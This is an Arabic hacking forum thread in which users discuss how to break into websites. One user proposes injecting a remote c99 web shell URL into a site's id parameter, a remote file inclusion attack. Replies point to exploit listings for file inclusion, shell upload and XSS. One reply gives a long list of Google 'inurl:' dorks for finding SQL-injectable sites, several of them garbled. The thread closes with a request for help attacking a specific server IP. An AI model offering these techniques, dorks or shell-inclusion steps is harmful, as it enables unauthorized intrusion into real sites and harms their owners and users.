السلام

شباب لو ببحث عن ثغرة بالسيرفر مثلا remote file include وش اكتب

و command execution
و remote file inclusion
اما SQL اعرفه ^_^
لو مثلا ثغرة ربط الشل كذا http://www.sh3ll.org/c99.txt?
يعني مثلا اكتب id بالسيرفر ويطلع لي موقع
www.site.com/index.php?id=1

امسح رقم واحد واحط رابط الشل ؟
ولا كيف
واتمنى تعلموني كيف ابحث عن الثغرات الي فوق

احلم تلاقي هذه الثغرة في الوقت الحاضر بعد نزول الاصدار الجديد من قاعدة البيانات
وال php .5
اتركها لتضيع وقتك بها لان كل المواقع مرقين هذه الثغرة

مشكور
بس لو ببحث عن ثغرة غير sql وش الي ابحث عنهم

احلم تلاقي هذه الثغرة في الوقت الحاضر بعد نزول الاصدار الجديد من قاعدة البيانات
وال php .5
اتركها لتضيع وقتك بها لان كل المواقع مرقين هذه الثغرة

كلام صحيح عالعموم لا تشغل بالك بذي اختار ثغرات غيرها وسهله
مثال
ثغرة الفورن بيج حلوه وسهله

Local File Inclusion Vulnerability (http://www.1337day.com/exploit/description/20532)
File/Shell Upload Vulnerab.. (http://www.1337day.com/exploit/description/20494)
XSS Vulnerabilities (http://www.1337day.com/exploit/description/20528)
وكثير ثغرات مكتوبة بلغات برمجية متوفرة على مواقع السكيورتي

وهذا محرك بحث عن الثغرات
http://exploitsearch.com/

بالنسبه sql وش تبحث تحط ذي الدوركات بكوكل وتطلعلك المواقع
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?

مشكورين بس هاذي اختراقات عشوائية صح ؟

لا انا ابي مثلا مستهداف سيرفر الاي بي xxx.x.x.xx

ابي ابحث عن ثغرات بالسيرفر وكذا ووش الثغرات الي ابحث عنها